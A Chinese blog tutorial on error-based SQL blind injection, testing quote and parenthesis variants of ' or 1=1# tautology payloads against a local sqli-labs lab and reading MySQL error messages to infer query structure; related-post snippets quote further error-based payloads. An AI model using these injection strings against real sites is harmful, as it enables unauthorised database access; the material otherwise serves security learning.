基于错误信息的SQL盲注

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量7.6k 收藏 7
点赞数 2
分类专栏: SQL注入 文章标签: SQL盲注 SQL注入 基于错误信息
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/linyt/article/details/53041229
版权

何谓盲注

SQL注入基础一文中介绍了SQL注入的基本原理,可以轻易注入的原因是知道SQL拼接代码是怎么写的。

很多情况下,很难甚至无法知道对方的SQL拼接语句是怎么写的,这里情况下需要做尝试,分析代码是采用何种拼接结构,然后再写个万能注入公式,这就是SQL盲注。如果利用错误提示信息,对SQL拼接方式做猜测并验证,这种方法称为基于错误信息的SQL盲注

SQL拼接方式以及破解方法

此前遇到的SQL拼接写法是这样的:

sql = "SELECT * from users where name = '$name' AND passwd = '$passwd'

实际上SQL混淆写法是多种多样的,可以分为两个维度:

  1. 引号:是否有引号,单引号还是双引号
  2. 括号:是否有括号,单重括号还是多重插号

那组合出来的SQL拼接情况如下表:

引号括号SQL拼接实例注入方式
select * from uers where id = $idid=-1 or 1=1#
单重select * from users where id = ($id)id=-1) or 1=1#
select * from user where id = '$id'id=’ or 1=1#
单重select * from user where id = ('$id')id=’) or 1=1#
select * from user where id = "$id"id=” or 1=1#
单重select * from user where id = ("$id")id=”) or 1=1#
双重select * from user where id = (($id))id=-1)) or 1=1#
*双重或多重对于双重和多重情况,这里不枚举了

每种注入方式,如果跟SQL拼接实例不匹配,MySQL语法器都会报错。如果在网页能提示MySQL语法格式出错,那就可以证明该格式是不匹配的,同时也可以佐证PHP后台没有对参数做过滤或者转换。

利用sqli-labs平台进行验证

练习1(http://192.168.0.107/sqli-labs/Less-1/)

按照上表,将种注入参数往里灌,看哪种会成功

URL灌的参数结果
http://192.168.0.107/sqli-labs/Less-1/?id=-1 or 1=1#id=-1 or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-1/?id=-1) or 1=1#id=-1) or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-1/?id=' or 1=1#id=' or 1=1#成功
http://192.168.0.107/sqli-labs/Less-1/?id=') or 1=1#id=') or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-1/?id=" or 1=1#id=" or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-1/?id=") or 1=1#id=") or 1=1#sql语法报错

猜测SQL拼接如SELECT * FROM users WHERE id = '$id'

请注意:在Chrome浏览器里面,#字符需要写在URL转义符%23来代替,否则服务器接到的参数会少了#

练习2(http://192.168.0.107/sqli-labs/Less-2/

注入表如下:

URL灌的参数是否成功
http://192.168.0.107/sqli-labs/Less-2/?id=-1 or 1=1#id=-1 or 1=1#成功
http://192.168.0.107/sqli-labs/Less-2/?id=-1) or 1=1#id=-1) or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-2/?id=' or 1=1#id=' or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-2/?id=') or 1=1#id=') or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-2/?id=" or 1=1#id=" or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-2/?id=") or 1=1#id=") or 1=1#sql语法报错

猜测SQL拼接如SELECT * FROM users WHERE id = $id

练习4(http://192.168.0.107/sqli-labs/Less-3/

注入表如下:

URL灌的参数是否成功
http://192.168.0.107/sqli-labs/Less-4/?id=-1 or 1=1#id=-1 or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-4/?id=-1) or 1=1#id=-1) or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-4/?id=' or 1=1#id=' or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-4/?id=') or 1=1#id=') or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-4/?id=" or 1=1#id=" or 1=1#sql语法报错
http://192.168.0.107/sqli-labs/Less-4/?id=") or 1=1#id=") or 1=1#成功

猜测SQL拼接如SELECT * FROM users WHERE id = ("$id")

遇到多重括号该怎办

在做sqli-labs练习题时,如果出现上述6种注入格式都无法注入成功,很可能是遇到了多重括号的SQL拼接情况。比如Less-7(http://192.168.0.107/sqli-labs/Less-7/),使用上述6种注入方式都不行,就得考虑是否有两重或多重括号了。

假设是两重括号,然后id可能无引号/单引号/双引号 这几种场景来枚举,依赖尝试

http://192.168.0.107/sqli-labs/Less-7/?id=-1)) or 1=1#
http://192.168.0.107/sqli-labs/Less-7/?id=')) or 1=1#
http://192.168.0.107/sqli-labs/Less-7/?id=")) or 1=1#

发现 http://192.168.0.107/sqli-labs/Less-7/?id=')) or 1=1# 注入成功,可以断定它的SQL是这样拼接的SELECT * from user where id = (('$id'))

基于出错信息进行准确注入

其实在上面做了很傻的枚举尝试,如果有MySQL开发经验,根据网页报出的语法错误信息,就可以推测到SQL拼接是怎样实现的,可以更快注入成功。

比如在Less-1练习中,尝试注入id=1’
即访问:http://192.168.0.107/sqli-labs/Less-1/?id=1
马上获得如下错误信息:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1” LIMIT 0,1’ at line 1

关键信息是说: ”1” LIMIT 0,1’ 附近有语法问题,请留注一下,SQL语法错误提示时,是将有问题的语法用单引号括起来的,也即有问题的内容是:‘1” LIMIT 0,1

1’是输入内容,很明显能猜测到SQL拼接是:id=’$id’ 这种方式。

对于id = (($id))或者id = (('$id'))这两种拼接方式,使用id=1'或者id=1"注入方式,很容易就能从错误提示中找到SQL拼接方式。

语法错误说明了什么

如果注入过程中,出现语法错误提供信息,那你就可以放心了。因为语法错误从侧面说明了,PHP后台没有对输入做任何转义或者过滤。做了转义或过虑之后,所有)'"这些特殊字符都被处理了,不会错误语法错误,最多是查询不到符合条件的数据而已。

即然没有对输入做转义或者过滤,可以利用上述的注入表进行攻击,如果对MySQL出错提示了解的话,可以更快找到注入式,不需要每个都试。

但是有些题目只提供有语法出错,不告诉出错的具体内容,这时就需要猜和经验了。

小结

基于错误信息的SQL盲注,需要php区别3种情况

1)SQL语法出错
2)SQL合法,查询结果为空
3)SQL合法,查询结果非空

如果1)和2)结果返回都一样,当前方法是很难破解,因为输入的参数没法知道是否被转义了,还是语法格式不对。

如果有SQL语法报错信息,则一定表示没有被转义和过虑,可以放心做使用当前方法。

那基于错误信息的SQL盲注,只有上述这种办法吗?我想不止,但目前还没有了解,请有经验的朋友过来分享,谢谢。

海枫
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
SQL注入之报错型盲注详解
DM766924的博客
09-15 1811
报错显示的原理: 前提:MYSQL报错信息必须能够在页面回显。原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息。要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用。分类: 基于group by报错注入 基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 基于double数值类型超出范围报错注入(5.5.5及以上) 基于bignt溢出报错注入 基于数据重复性报错注入 报
SQL报错盲注
weixin_30594001的博客
04-14 355
嗯哼,这几天篮球比赛,天天训练,学习都耽搁了,DDCTF做了一会心态就爆炸了,蓝瘦,明天再打一场,希望能赢呢,打完就疯狂继续学习了。今天抽空又做了一些基本的SQL注入题目,墨者学院的一道报错注入的题目,很基础。并且没过滤啥,所以直接肝就完事了。我一开始用了SQLMAP就直接跑了,然后还是锻炼一下手注把。 首先,还是那个页面(最近又用起了火狐,毕竟比Chrome 占用资源少,卡顿少) 然后加...
sql注入盲注
最新发布
weixin_64815500的博客
06-19 988
sql注入关于无回显用到的盲注sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
⑧基于错误型SQL盲注
熊俊坤的博客
11-03 638
基于错误型SQL盲注
SQL注入之报错盲注(墨者学院)
waxcj的博客
05-02 2922
首先我们先来了解一下报错注入的基本概念 1:报错注入定义 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 2:报错注入前提 页面上没有回显点,但是必须有SQL语句执行错误的信息。 3:报错注入优缺点 优点:不需要显示位,如果有显示位建议使用union联合查询。 缺点:需要有SQL语句的报错信息。 4:构造报错注入的基本步骤 构造目标查询语句 选择报错注入函数 构造报错注入语句 拼接报错注入语句 5:常见的报错注入函数 updatexml(
基于错误回显的sql注入整理
ailugong8410的博客
06-08 429
  由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P   0x00 关于错误回显     用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰...
SQL注入之基于布尔的盲注详解
09-10
这种方式使得攻击者需要根据系统对正确或错误SQL查询的响应来推测数据库中的数据。 在基于布尔的盲注中,攻击者通常会尝试构造一系列的SQL查询,这些查询会在满足特定条件时改变原本的查询结果,从而导致网页返回...
sql盲注检测的简单脚本.zip
03-10
SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,它发生在Web应用程序中,攻击者通过提交特定的SQL查询到输入字段,然后根据系统响应或不响应来推断数据库的信息。这个"sql盲注检测的简单脚本.zip"压缩包...
SQL盲注利用工具
11-15
SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询到应用程序,根据应用程序对异常情况的响应来推断数据库中的信息。在这种情况下,我们讨论的是一款名为"BSQLInjector"的工具...
SQL盲注攻击与防范.pdf
09-19
基于错误的盲注攻击是指攻击者通过提交特殊值来引发数据库的错误信息,从而获取数据库的敏感信息。 二、SQL盲注攻击的详细操作 SQL盲注攻击的详细操作可以分为以下几个步骤: 1. 信息收集:攻击者需要收集目标...
网络安全原理与应用:SQL盲注.pptx
05-16
【网络安全原理与应用:SQL盲注SQL盲注是一种针对Web应用程序的安全漏洞利用技术,它主要发生在应用程序未能正确过滤或转义用户输入的SQL查询时。与传统的SQL注入不同,盲注并不直接显示注入语句的执行结果,...
mysql报错注入手工方法
weixin_30725467的博客
04-11 173
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。 总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。 公式具体如下 and(selec...
SQL报错注入
qq_64332865的博客
02-18 598
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
SQL报错型盲注
weixin_30274627的博客
07-29 152
原理 报错型注入利用了MySQL的第8652号bug :Bug#8652 group by part of rand() returns duplicate key error来进行的盲注,使得MySQL由于函数的特性返回错误信息,进而我们可以显示我们想要的信息,从而达到注入的效果;当然其他类型的数据库也存在相应的问题。 利用 Bug 8652的主要内容就是在使用group by...
基于报错的布尔盲注
qq_37301470的博客
11-12 608
基于报错的布尔盲注 条件: 只输出对错但不输出报错内容 函数 exp与cot exp(int) 自然对数的次方 cot(int) 余切值 select if((sql语句),exp(99999999),0) 根据是否报错来确定(sql语句)表达式的对错 通过一位一位判断来爆出结果 属于布尔盲注范畴 过滤 过滤 单引号 逃逸出攻击语句 php语句 sql=select * form users where username='$POST["name"]' and password ='$_POST["pwd
基于报错的sql注入
qq_44111753的博客
11-21 299
MYSQL中默认有个information schema数据库,用来存储数据库元信息。其中具有表schemata(数据库名)、tables(表名)、 columns(列名或字段名)。 schemata:schema_ name字段用来存储数据库名。 tables:table_ schema和table_ name分别用来存储数据库名和表名。 columns:table_schema(数据库名)、table_name(表名)、column name(字段名) 1、发现SQL注入 根据报错信息'1'' LIM
SQL盲注之报错注入
weixin_30436891的博客
04-17 142
1.报错注入   payload:union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from   information_schema.columns group by a %23 2.利用double数值类型超出范围进行报错注入   payload:union ...
SQL注入4之报错型盲注
weixin_56218159的博客
05-27 357
SQL注入之报错型盲注详解 报错显示的原理 前提:MYSQL报错信息必须能够在页面回显 原理:通过MYSQL一些函数的限制条件让其报错,产生超出预期的结果,且报错信息中包含重要信息 要求:需要能够知道MYSQL中哪些函数有限制条件,利用限制条件进行报错,需要了解函数原理才知道熟悉运用 分类 》基于group by报错注入 》基于xpath函数报错注入(5.1.1及以上,extractvalue和updatexml) 》基于double数值类型超出范围报错注入(5.5.5及以上) 》基于bignt溢出
GET基于报错的SQL注入
qq_43776408的博客
06-04 458
SQL注入分类 GET基于报错的SQL注入发现 你先下载sqli,还有phpstudy集成环境 上述你之前都玩过 浏览器输入ip/sqli 你会看到类似于树的分支一样的东西 当中第一个Less1就是今天我们要学的 还有后面几个带有Error 重点看那行黄字 然后浏览器输入ip/sqli/Less-1/?id=1 回车 界面就变了 数字可以自行改变 接下来后面加一个单引号 再次回车 ’‘14‘’LIMIT 0,1’ at line 1’ 先去掉左右单引号 ‘14‘’LIMIT 0,1’ at line
CTF比赛中的SQL盲注技巧与实战策略
"本文主要介绍了CTF竞赛中常见的SQL盲注技巧和一些实用的建议,包括XOR注入方法,以及如何应对WAF和过滤规则的挑战。" 在CTF(Capture The Flag)网络安全竞赛中,SQL盲注是一种常见的攻击手段,特别是在面对具有...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值